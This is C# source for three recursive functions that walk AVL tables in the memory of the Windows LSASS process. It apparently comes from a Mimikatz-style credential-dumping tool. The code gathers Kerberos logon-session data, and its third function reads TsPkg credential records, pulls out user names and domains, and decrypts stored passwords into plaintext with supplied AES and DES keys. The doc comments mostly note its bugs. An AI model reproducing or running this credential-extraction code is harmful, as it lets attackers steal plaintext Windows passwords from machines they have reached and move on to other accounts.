/// <summary>
/// Recursively walks an <c>RTL_AVL_TABLE</c> node read from the target process and collects one
/// <see cref="KerberosLogonItem"/> per node whose <c>OrderedPointer</c> is non-null.
/// Each node is read with <c>Utility.ReadFromLsass</c> and deserialised with <c>Utility.ReadStruct</c>;
/// the right subtree is visited before the left one.
/// </summary>
/// <param name="hLsass">Handle used by <c>Utility.ReadFromLsass</c>; passed by <c>ref</c> through every call.</param>
/// <param name="pElement">Address of the node to read. <c>IntPtr.Zero</c> ends the recursion.</param>
/// <param name="klogonlist">Receives one item (session address + <c>oshelper.LogonSessionTypeSize</c> raw bytes) per non-null <c>OrderedPointer</c>.</param>
/// <param name="oshelper">Supplies <c>LogonSessionTypeSize</c>, the number of bytes read at <c>OrderedPointer</c>.</param>
/// <param name="iv">Not used by this overload; only forwarded to the recursive calls.</param>
/// <param name="aeskey">Not used by this overload; only forwarded to the recursive calls.</param>
/// <param name="deskey">Not used by this overload; only forwarded to the recursive calls.</param>
/// <param name="logonlist">Not used by this overload; only forwarded to the recursive calls.</param>
/// <remarks>
/// There is no depth limit or visited-set: recursion is bounded only by the child pointers read from the
/// target, so a corrupted or cyclic tree would recurse until the stack overflows.
/// Unlike the two sibling overloads, the entry guard compares against <c>IntPtr.Zero</c>, so it actually fires.
/// </remarks>
private static void WalkAVLTables(ref IntPtr hLsass, IntPtr pElement, List <KerberosLogonItem> klogonlist, OSVersionHelper oshelper, byte[] iv, byte[] aeskey, byte[] deskey, List <Logon> logonlist) { if (pElement == IntPtr.Zero) { return; } byte[] entryBytes = Utility.ReadFromLsass(ref hLsass, pElement, Marshal.SizeOf(typeof(RTL_AVL_TABLE))); RTL_AVL_TABLE entry = Utility.ReadStruct <RTL_AVL_TABLE>(entryBytes); if (entry.OrderedPointer != IntPtr.Zero) { /* only the address and raw bytes are captured here; parsing happens elsewhere */ byte[] krbrLogonSessionBytes = Utility.ReadFromLsass(ref hLsass, entry.OrderedPointer, oshelper.LogonSessionTypeSize); KerberosLogonItem item = new KerberosLogonItem(); item.LogonSessionAddress = entry.OrderedPointer; item.LogonSessionBytes = krbrLogonSessionBytes; klogonlist.Add(item); } /* right subtree first, then left */ if (entry.BalancedRoot.RightChild != IntPtr.Zero) { WalkAVLTables(ref hLsass, entry.BalancedRoot.RightChild, klogonlist, oshelper, iv, aeskey, deskey, logonlist); } if (entry.BalancedRoot.LeftChild != IntPtr.Zero) { WalkAVLTables(ref hLsass, entry.BalancedRoot.LeftChild, klogonlist, oshelper, iv, aeskey, deskey, logonlist); } }
/// <summary>
/// Recursively walks an <c>RTL_AVL_TABLE</c> node read from the target process and appends the raw
/// bytes found at each non-null <c>OrderedPointer</c> to <paramref name="klogonlist"/>.
/// Same traversal as the <c>List&lt;KerberosLogonItem&gt;</c> overload (right subtree, then left), but the
/// session address is not retained, only the bytes.
/// </summary>
/// <param name="hLsass">Handle used by <c>Utility.ReadFromLsass</c>; passed by <c>ref</c> through every call.</param>
/// <param name="pElement">Address of the node to read.</param>
/// <param name="klogonlist">Receives <c>oshelper.LogonSessionTypeSize</c> bytes per non-null <c>OrderedPointer</c>.</param>
/// <param name="oshelper">Supplies <c>LogonSessionTypeSize</c>.</param>
/// <param name="iv">Not used by this overload; only forwarded to the recursive calls.</param>
/// <param name="aeskey">Not used by this overload; only forwarded to the recursive calls.</param>
/// <param name="deskey">Not used by this overload; only forwarded to the recursive calls.</param>
/// <param name="logonlist">Not used by this overload; only forwarded to the recursive calls.</param>
/// <remarks>
/// The entry guard <c>pElement == null</c> compares a non-nullable <c>IntPtr</c> with <c>null</c>; that
/// expression is always false, so a zero <paramref name="pElement"/> is not rejected here (the sibling
/// overload compares with <c>IntPtr.Zero</c> instead). The recursive calls only pass non-zero children,
/// so the guard matters only for the initial call.
/// Lengths are converted with <c>Convert.ToUInt64</c>, so this presumably targets a <c>ulong</c>-length
/// overload of <c>ReadFromLsass</c> — verify against Utility.
/// No depth limit or visited-set guards the recursion.
/// </remarks>
private static void WalkAVLTables(ref IntPtr hLsass, IntPtr pElement, List <byte[]> klogonlist, OSVersionHelper oshelper, byte[] iv, byte[] aeskey, byte[] deskey, List <Logon> logonlist) { if (pElement == null) /* always false for IntPtr; see remarks */ { return; } byte[] entryBytes = Utility.ReadFromLsass(ref hLsass, pElement, Convert.ToUInt64(Marshal.SizeOf(typeof(RTL_AVL_TABLE)))); RTL_AVL_TABLE entry = Utility.ReadStruct <RTL_AVL_TABLE>(entryBytes); if (entry.OrderedPointer != IntPtr.Zero) { byte[] krbrLogonSessionBytes = Utility.ReadFromLsass(ref hLsass, entry.OrderedPointer, Convert.ToUInt64(oshelper.LogonSessionTypeSize)); klogonlist.Add(krbrLogonSessionBytes); } /* right subtree first, then left */ if (entry.BalancedRoot.RightChild != IntPtr.Zero) { WalkAVLTables(ref hLsass, entry.BalancedRoot.RightChild, klogonlist, oshelper, iv, aeskey, deskey, logonlist); } if (entry.BalancedRoot.LeftChild != IntPtr.Zero) { WalkAVLTables(ref hLsass, entry.BalancedRoot.LeftChild, klogonlist, oshelper, iv, aeskey, deskey, logonlist); } }
/// <summary>
/// Recursively walks an <c>RTL_AVL_TABLE</c> node and, for each non-null <c>OrderedPointer</c>, reads a
/// TS credential record, resolves its LUID and <c>KIWI_TS_PRIMARY_CREDENTIAL</c>, and merges the result
/// into <paramref name="logonlist"/> as a <c>Credential.Tspkg</c> entry keyed by LUID.
/// Traversal order is right subtree, then left, as in the sibling overloads.
/// </summary>
/// <param name="hLsass">Handle used by <c>Utility.ReadFromLsass</c> (by <c>ref</c>) and <c>Utility.ExtractUnicodeStringString</c> (by value).</param>
/// <param name="pElement">Address of the node to read.</param>
/// <param name="oshelper">Supplies <c>TSCredType</c> (record size), <c>TSCredLocallyUniqueIdentifierOffset</c> and <c>TSCredOffset</c>.</param>
/// <param name="iv">Forwarded to <c>BCrypt.DecryptCredentials</c> together with <paramref name="aeskey"/> and <paramref name="deskey"/>.</param>
/// <param name="aeskey">See <paramref name="iv"/>.</param>
/// <param name="deskey">See <paramref name="iv"/>.</param>
/// <param name="logonlist">Existing <c>Logon</c> entries; matched on <c>LogonId.HighPart</c>/<c>LowPart</c>. A new <c>Logon</c> is appended when no match exists.</param>
/// <remarks>
/// <c>pElement == null</c> is always false for a non-nullable <c>IntPtr</c>, so a zero pointer is not rejected
/// at entry (only the recursive calls filter zero children).
/// The password bytes are decoded as little-endian UTF-16 with <c>throwOnInvalidBytes = true</c>; any
/// exception (the catch is <c>Exception</c>, not just <c>DecoderFallbackException</c>) falls back to a hex dump.
/// The inner <c>!string.IsNullOrEmpty(username)</c> test is redundant — the enclosing <c>if</c> already requires
/// <c>username.Length &gt; 1</c> — so the <c>"******"</c> user-name fallback is unreachable.
/// No depth limit or visited-set guards the recursion.
/// </remarks>
private static void WalkAVLTables(ref IntPtr hLsass, IntPtr pElement, OSVersionHelper oshelper, byte[] iv, byte[] aeskey, byte[] deskey, List <Logon> logonlist) { if (pElement == null) /* always false for IntPtr; see remarks */ { return; } byte[] entryBytes = Utility.ReadFromLsass(ref hLsass, pElement, Convert.ToUInt64(Marshal.SizeOf(typeof(RTL_AVL_TABLE)))); RTL_AVL_TABLE entry = Utility.ReadStruct <RTL_AVL_TABLE>(entryBytes); if (entry.OrderedPointer != IntPtr.Zero) { /* record size and field offsets come from the OS-version helper */ byte[] krbrLogonSessionBytes = Utility.ReadFromLsass(ref hLsass, entry.OrderedPointer, Convert.ToUInt64(Marshal.SizeOf(oshelper.TSCredType))); LUID luid = Utility.ReadStruct <LUID>(Utility.GetBytes(krbrLogonSessionBytes, oshelper.TSCredLocallyUniqueIdentifierOffset, Marshal.SizeOf(typeof(LUID)))); long pCredAddr = BitConverter.ToInt64(krbrLogonSessionBytes, oshelper.TSCredOffset); byte[] pCredBytes = Utility.ReadFromLsass(ref hLsass, new IntPtr(pCredAddr), Convert.ToUInt64(Marshal.SizeOf(typeof(KIWI_TS_PRIMARY_CREDENTIAL)))); KIWI_TS_PRIMARY_CREDENTIAL pCred = Utility.ReadStruct <KIWI_TS_PRIMARY_CREDENTIAL>(pCredBytes); UNICODE_STRING usUserName = pCred.credentials.UserName; UNICODE_STRING usDomain = pCred.credentials.Domaine; UNICODE_STRING usPassword = pCred.credentials.Password; string username = Utility.ExtractUnicodeStringString(hLsass, usUserName); string domain = Utility.ExtractUnicodeStringString(hLsass, usDomain); /* MaximumLength (not Length) bytes are read from the password buffer */ byte[] msvPasswordBytes = Utility.ReadFromLsass(ref hLsass, usPassword.Buffer, (ulong)usPassword.MaximumLength); byte[] msvDecryptedPasswordBytes = BCrypt.DecryptCredentials(msvPasswordBytes, iv, aeskey, deskey); string passDecrypted = ""; /* UTF-16LE, no BOM, throw on invalid bytes -> hex fallback below */ UnicodeEncoding encoder = new UnicodeEncoding(false, false, true); try { passDecrypted = encoder.GetString(msvDecryptedPasswordBytes); } catch (Exception) { passDecrypted = Utility.PrintHexBytes(msvDecryptedPasswordBytes); } if (!string.IsNullOrEmpty(username) && username.Length > 1) { Credential.Tspkg krbrentry = new Credential.Tspkg(); if (!string.IsNullOrEmpty(username)) { /* always true here; the else branch is unreachable */
krbrentry.UserName = username; } else { krbrentry.UserName = "******"; } if (!string.IsNullOrEmpty(domain)) { krbrentry.DomainName = domain; } else { krbrentry.DomainName = "[NULL]"; } // Check if password is present if (!string.IsNullOrEmpty(passDecrypted)) { krbrentry.Password = passDecrypted; } else { krbrentry.Password = "******"; } Logon currentlogon = logonlist.FirstOrDefault(x => x.LogonId.HighPart == luid.HighPart && x.LogonId.LowPart == luid.LowPart); if (currentlogon == null) { currentlogon = new Logon(luid); currentlogon.UserName = username; currentlogon.Tspkg = krbrentry; logonlist.Add(currentlogon); } else { currentlogon.Tspkg = krbrentry; } } } if (entry.BalancedRoot.RightChild != IntPtr.Zero) { WalkAVLTables(ref hLsass, entry.BalancedRoot.RightChild, oshelper, iv, aeskey, deskey, logonlist); } if (entry.BalancedRoot.LeftChild != IntPtr.Zero) { WalkAVLTables(ref hLsass, entry.BalancedRoot.LeftChild, oshelper, iv, aeskey, deskey, logonlist); } }